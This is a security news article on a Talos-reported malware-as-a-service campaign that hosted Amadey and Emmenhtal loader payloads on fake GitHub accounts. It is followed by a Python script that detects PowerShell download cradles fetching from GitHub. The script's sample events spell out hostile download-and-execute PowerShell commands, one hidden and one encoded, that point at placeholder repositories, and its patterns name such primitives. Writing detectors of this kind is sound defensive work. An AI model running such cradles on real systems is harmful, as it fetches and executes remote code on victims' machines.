
Threat Actors Weaponize GitHub Accounts to Distribute Payloads, Tools, and Amadey Malware Plugins


Cisco Talos’ thorough investigation reveals a sophisticated Malware-as-a-Service (MaaS) operation that uses GitHub as an open directory to distribute malicious payloads, tools, and Amadey malware plugins.

By staging files on a trusted developer platform, the operation sidesteps security controls that would block downloads from less reputable hosting.

In an operation identified by Cisco Talos, threat actors harnessed the Amadey malware to facilitate the delivery of a variety of secondary payloads.

The actors operated fake GitHub accounts, notably “Legendary99999”, “DFfe9ewf”, and “Milidmdds”, as staging repositories for malware samples, tools, and plugins.

Hosting malicious files on GitHub allows these campaigns to exploit organizational reliance on the platform, enabling malicious downloads to blend into legitimate traffic and bypass many security filters.

DFfe9ewf GitHub account overview.

Analysis revealed a direct overlap in tactics, techniques, and procedures (TTPs) between this MaaS infrastructure and a concurrent SmokeLoader phishing campaign targeting Ukrainian entities.

Both operations used a variant of the multistage “Emmenhtal” loader, also known as PEAKLIGHT, which orchestrated the download of Amadey or other malware families such as Redline, Lumma, and AsyncRAT from public GitHub repositories.

Multi-Stage Obfuscation

The Emmenhtal loader, extensively profiled by cybersecurity vendors, is characterized by its use of four layered obfuscations: three stages of randomized JavaScript variable encodings and embedded PowerShell, topped by a final payload decryption routine.

These loaders appeared in phishing campaigns as attachments in compressed archives, camouflaged as legitimate billing documents and invoices.

Upon execution, the JavaScript and obfuscated PowerShell layers ultimately fetched next-stage payloads from attacker-controlled infrastructure or from the aforementioned GitHub repositories.

Interestingly, this MaaS network was observed adapting its infrastructure to serve a broad clientele, distributing an array of malware families from a single set of GitHub accounts.

Repository structures consistently mirrored those found in earlier SmokeLoader incidents, further substantiating operational synergy or shared development resources between these campaigns.

By leveraging GitHub’s legitimate standing among developer communities, and the inherent difficulty of blocking the platform in enterprise environments, the threat actors effectively weaponized trusted infrastructure to propagate malware.

The “Legendary99999” account alone hosted over 160 repositories, each containing distinct payloads, from different malware families to tools like Selenium WebDriver and even legitimate binaries such as PuTTY.

While some organizations attempt to block file-sharing services outright, software development teams need access to GitHub, which leaves a persistent gap that is being actively exploited.

Subsequent analysis of related GitHub accounts revealed sophisticated file obfuscation, creative naming conventions, and operational compartmentalization, pointing to a mature criminal enterprise with MaaS offerings tailored for various customers.

Once Amadey had infected a host, operators dynamically selected additional payloads to deploy by having the host fetch files hosted in the repositories’ release sections.

Notably, certain Emmenhtal loader variants were found disguised as MP4 files or using new delivery mechanisms, such as a Python script masquerading as a cryptocurrency account enumeration tool.

Despite variations in initial dropper formats, the PowerShell routines employed to download and execute Amadey remained functionally and structurally consistent, highlighting the modularity and reuse of the attacker toolkit.

Initial PowerShell command, Checkbalance.py.

Prompt takedown of the identified GitHub accounts by the platform post-disclosure demonstrates effective collaboration between security vendors and service providers.

Nevertheless, the campaign underscores the ability of cybercriminals to rapidly adapt and weaponize public code repositories, challenging defenders to distinguish malicious access patterns amidst legitimate development activity.

As malware operators increasingly adopt MaaS models, organizations must harden network egress policies, bolster monitoring for suspicious GitHub interactions, and adopt advanced threat detection capable of recognizing multistage obfuscation and downloader activity to thwart similar attacks.
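The consistent PowerShell download-and-execute routine noted above, and the recommendation to monitor for suspicious GitHub interactions, both come down to one detection question: which process-creation events show a PowerShell cradle fetching bytes from a GitHub raw or release endpoint under conditions a developer download would not carry? The script below is an added example written for this page; it is not code from the Talos report or from the article. It runs over constructed Sysmon-style events embedded inline, decodes any -EncodedCommand blob (UTF-16LE base64) before matching, and separates a scripted loader from an administrator pulling a release interactively. The indicator lists, the alert threshold, and every account, repository and file name are assumptions and placeholders.

```python
"""Flag PowerShell download cradles that pull payloads from GitHub.

Added example, not code from the Talos report or this article. The indicator
lists and threshold are this example's own assumptions; the events are
constructed, and every account, repository and file name is a placeholder.
"""
import base64
import binascii
import re

# Download primitives commonly abused in PowerShell cradles (assumed list).
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
    r"\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)
# Ways to run what was just downloaded.
EXEC_RE = re.compile(r"(\bIEX\b|Invoke-Expression|Start-Process|\bsaps\b)", re.I)
# GitHub endpoints that hand out raw files or release assets, i.e. where a
# repository used as an "open directory" actually serves bytes.
GITHUB_URL_RE = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|objects\.githubusercontent\.com|"
    r"github\.com/[^/\s'\"]+/[^/\s'\"]+/releases/download)/[^\s'\")<>,;]*", re.I)
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|noni\b|noninteractive)", re.I)
# Parents that mean a script-based loader spawned PowerShell, not a person.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                       "python.exe", "pythonw.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand blob (UTF-16LE) if one is present,
    so the indicator regexes see the real instructions. Malformed blobs are
    left alone rather than crashing the scan."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def analyze_event(event: dict) -> dict:
    """Score one process-creation event (parent, image, cmdline)."""
    cmd = decode_encoded_command(event["cmdline"])
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if cmd != event["cmdline"]:
        reasons.append("encoded_command")
    if CRADLE_RE.search(cmd):
        reasons.append("download_cradle")
    gh = GITHUB_URL_RE.search(cmd)
    if gh:
        reasons.append("github_payload_url")
    if EXEC_RE.search(cmd):
        reasons.append("execute_after_download")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden_or_noprofile")
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append("script_host_parent:" + parent)
    # A GitHub fetch through a cradle is only an alert when paired with
    # something an interactive developer download would not normally carry.
    core = {"download_cradle", "github_payload_url"} <= set(reasons)
    aggravating = any(r.split(":")[0] in
                      {"execute_after_download", "encoded_command",
                       "hidden_or_noprofile", "script_host_parent"}
                      for r in reasons)
    return {"alert": core and aggravating, "reasons": reasons,
            "url": gh.group(0) if gh else None}


def _enc(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; account and repository names are placeholders.
SAMPLE_EVENTS = [
    # 1. JScript dropper (wscript) spawning a hidden PowerShell that pulls a
    #    release asset and launches it.
    {"parent": r"C:\Windows\System32\wscript.exe", "image": PS,
     "cmdline": ('powershell -nop -w hidden -c "$p = Join-Path $env:TEMP svc.exe; '
                 "(New-Object Net.WebClient).DownloadFile('https://github.com/"
                 "example-user/example-repo/releases/download/v1/svc.exe', $p); "
                 'Start-Process $p"')},
    # 2. A Python decoy script launching an encoded cradle against raw content.
    {"parent": r"C:\Users\dev\AppData\Local\Programs\Python\Python311\python.exe",
     "image": PS,
     "cmdline": "powershell.exe -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('https://raw."
         "githubusercontent.com/example-user/example-repo/main/stage2.ps1')")},
    # 3. An administrator fetching a release asset interactively: same host,
    #    no execution, benign parent. Must stay quiet.
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": ("powershell Invoke-WebRequest -Uri https://github.com/example-org/"
                 "example-tool/releases/download/v2.1/tool.zip -OutFile tool.zip")},
    # 4. Ordinary developer traffic: a clone carries no cradle at all.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": "git clone https://github.com/example-org/example-tool.git"},
]


def scan(events):
    """Return the analyses of all events that cross the alert threshold."""
    return [r for r in (analyze_event(e) for e in events) if r["alert"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["url"], hit["reasons"])
```

Only the first two events fire: the wscript-spawned hidden download plus Start-Process, and the Python-spawned encoded IEX cradle. The interactive Invoke-WebRequest to a release asset carries the same host and cradle but nothing aggravating, so it is left for egress logging rather than alerting, and the git clone matches nothing. In production the parent list and the aggravating set are the knobs to tune against your own developer baseline.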
